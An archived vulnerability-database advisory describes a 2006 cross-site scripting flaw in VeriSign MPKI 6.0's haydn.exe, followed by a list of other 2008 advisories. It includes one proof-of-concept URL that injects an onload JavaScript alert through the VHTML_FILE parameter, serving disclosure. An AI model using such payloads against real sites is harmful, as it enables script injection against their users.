exploits , vulnerabilities , articles , Verisign MPKI 6.0 Haydn.EXE Cross-Site Scripting Vulnerability

Title	Verisign MPKI 6.0 Haydn.EXE Cross-Site Scripting Vulnerability
Published	2006-03-20-12:00AM
Updated	2006-03-21-09:09PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Alberto Soli?o from Core Security Technologies is credited with the discovery of this vulnerability.
Vulnerable	VeriSign MPKI 6.0
Not Vulnerable
Code	This issue can be exploited with a web browser. An example has been provided: https://www.example.com/cgi-bin/haydn.exe?VHTML_FILE=test<body> onload=javascript:alert('fixme!')>file_name</body>.htm
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-08-28 Avaya SES Authentication Bypass Vulnerability and Information Disclosure Weakness
• 2008-08-28 Opera Web Browser 9.51 Multiple Security Vulnerabilities
• 2008-08-28 Aurora Password Manager System Tray Icon Information Disclosure Vulnerability
• 2008-08-28 GE Fanuc Proficy Information Portal HTTP Basic Authentication Information Disclosure Vulnerability
• 2008-08-28 Interleave Information Disclosure Vulnerabilities
• 2008-08-28 NOAH Unspecified Cross-Site Scripting Vulnerability
• 2008-08-27 itMedia Multiple SQL Injection Vulnerabilities
• 2008-08-27 Sun Java System Portal Server Portlets Cross-Site Scripting Vulnerability
• 2008-08-27 SWIMAGE Encore Master Password Information Disclosure Vulnerability
• 2008-08-27 Attachmate Reflection for Secure IT Multiple Unspecified Security Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 28 Aug 2008 11:38:38 +0000